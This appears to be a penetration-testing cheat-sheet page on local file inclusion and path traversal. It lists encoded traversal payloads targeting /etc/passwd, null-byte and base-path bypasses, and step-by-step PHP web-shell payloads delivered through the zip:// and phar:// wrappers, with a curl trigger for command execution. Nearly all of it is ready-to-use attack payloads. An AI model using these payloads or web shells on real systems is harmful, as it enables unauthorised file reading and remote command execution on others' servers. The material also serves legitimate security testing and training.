LFI / Path Traversal

We can bypass filters various ways:

../../../../etc/passwd
....//....//....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
..%c0%af..%c0%af..%c0%af/etc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f/etc/passwd

An app may require file name to start with base folder like /var/www/images. We can then try filename=/var/www/images/../../../etc/passwd .

An app may require filename to end with expected file extension like .jpg. We can then trye filename=../../../etc/passwd%00.png .

PHP wrappers

Its possible to use a .zip file and use the phar wrapper. Create a .php file with a payload and zip it. Then upload /?page=phar://uploads/payload.zip/payload&cmd=id

zip://

Wen upload file is possible

# Create payload
echo "<?php system($_GET['cmd']); ?>" > payload.php
# Zip zip payload.zip payload.php
zip payload.zip payload.php

# Execute commands
/?page=zip://uploads/payload.zip/payload.php&cmd=id 
# Could be possible without extension
/?page=zip://uploads/payload.zip/payload&cmd=id

phar://

Uploading files is needed

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

Compile script into .phar file

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Trigger filie

curl --user-agent "PENTEST" "$URL/?parameter=phar://./shell.jpg%2Fshell.txt&cmd=id"

For more wrappers:

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams

Last updated 1 month ago

Was this helpful?